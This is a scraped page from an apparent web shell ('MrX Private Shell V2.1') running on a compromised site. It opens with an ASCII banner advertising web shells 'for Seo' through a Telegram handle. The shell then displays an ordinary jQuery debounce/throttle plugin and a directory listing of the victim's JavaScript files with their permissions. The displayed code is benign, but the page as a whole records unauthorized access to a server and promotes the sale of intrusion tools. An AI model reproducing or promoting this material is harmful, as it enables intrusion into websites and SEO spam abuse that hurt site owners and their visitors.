__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
/** * Debounce and throttle function's decorator plugin 1.0.6 * * Copyright (c) 2009 Filatov Dmitry ([email protected]) * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * http://www.gnu.org/licenses/gpl.html * */ (function ($) { $.extend({ /** * Debounce's decorator * @param {Function} fn original function * @param {Number} timeout timeout * @param {Boolean} [invokeAsap=false] invoke function as soon as possible * @param {Object} [ctx] context of original function */ debounce: function (fn, timeout, invokeAsap, ctx) { if (arguments.length == 3 && typeof invokeAsap != 'boolean') { ctx = invokeAsap; invokeAsap = false; } var timer; return function () { var args = arguments; ctx = ctx || this; invokeAsap && !timer && fn.apply(ctx, args); clearTimeout(timer); timer = setTimeout(function () { invokeAsap || fn.apply(ctx, args); timer = null; }, timeout); }; }, /** * Throttle's decorator * @param {Function} fn original function * @param {Number} timeout timeout * @param {Object} [ctx] context of original function */ throttle: function (fn, timeout, ctx) { var timer, args, needInvoke; return function () { args = arguments; needInvoke = true; ctx = ctx || this; timer || (function () { if (needInvoke) { fn.apply(ctx, args); needInvoke = false; timer = setTimeout(arguments.callee, timeout); } else { timer = null; } })(); }; } }); })(jQuery);
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| additional-methods.js | File | 50.32 KB | 0644 |
|
| jquery-migrate.min.js | File | 13.16 KB | 0644 |
|
| jquery-ui-timepicker-addon.js | File | 76.71 KB | 0644 |
|
| jquery-ui.min.js | File | 317.01 KB | 0644 |
|
| jquery.debounce-1.0.6.js | File | 1.57 KB | 0644 |
|
| jquery.min.js | File | 86.95 KB | 0644 |
|
| jquery.min.map | File | 151.53 KB | 0644 |
|
| jquery.mousewheel.js | File | 8.07 KB | 0644 |
|
| jquery.tablesorter.js | File | 105.57 KB | 0644 |
|
| jquery.uitablefilter.js | File | 3.07 KB | 0644 |
|
| jquery.validate.min.js | File | 24.03 KB | 0644 |
|